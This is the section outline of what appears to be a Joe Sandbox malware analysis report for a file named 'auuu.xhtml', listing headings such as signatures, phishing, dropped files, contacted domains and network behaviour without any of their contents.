Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Static File Info

General

Static OLE Info

General

OLE File "auuu.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
auuu.xhtml